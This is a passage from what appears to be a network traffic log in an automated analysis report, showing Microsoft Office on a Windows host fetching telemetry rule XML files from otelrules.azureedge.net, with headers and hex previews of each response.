                                                                                                                                                                                                2024-11-20 09:54:35 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                118192.168.2.74982213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                x-ms-request-id: 62f37542-501e-0016-6f8c-3a181b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-1777c6cb754lvj6mhC1TEBke9400000009m0000000000gc0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:35 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                119192.168.2.74982413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-1777c6cb754xlpjshC1TEBv8cc00000009gg00000000cqs9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:35 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                120192.168.2.74982613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                x-ms-request-id: 538caadb-101e-0028-028c-3a8f64000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-185f5d8b95c68cvnhC1NYCfn7s0000000a30000000005s4h
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:35 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                121192.168.2.74982713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-185f5d8b95crwqd8hC1NYCps6800000009yg00000000ezbs
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:35 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                122192.168.2.74982913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                x-ms-request-id: 7bd1ae59-401e-008c-598c-3a86c2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-185f5d8b95cdtclvhC1NYC4rmc0000000a6g0000000074rc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                123192.168.2.74983013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:35 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095435Z-r1d97b99577jlrkbhC1TEBq8d000000008fg00000000dqek
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                124192.168.2.74983113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:36 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                x-ms-request-id: 8222e379-801e-008f-078c-3a2c5d000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095436Z-r1d97b99577hc74hhC1TEBvbns00000008n00000000033uy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                125192.168.2.74983213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:36 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                x-ms-request-id: bfe6e8fa-201e-006e-3f8c-3abbe3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095436Z-185f5d8b95csd4bwhC1NYCq7dc00000009wg00000000g086
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                126192.168.2.74983313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:36 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                x-ms-request-id: b82dd3a8-b01e-0053-0e8c-3acdf8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095436Z-1777c6cb754wcxkwhC1TEB3c6w000000099000000000durm
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                127192.168.2.74983413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:36 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
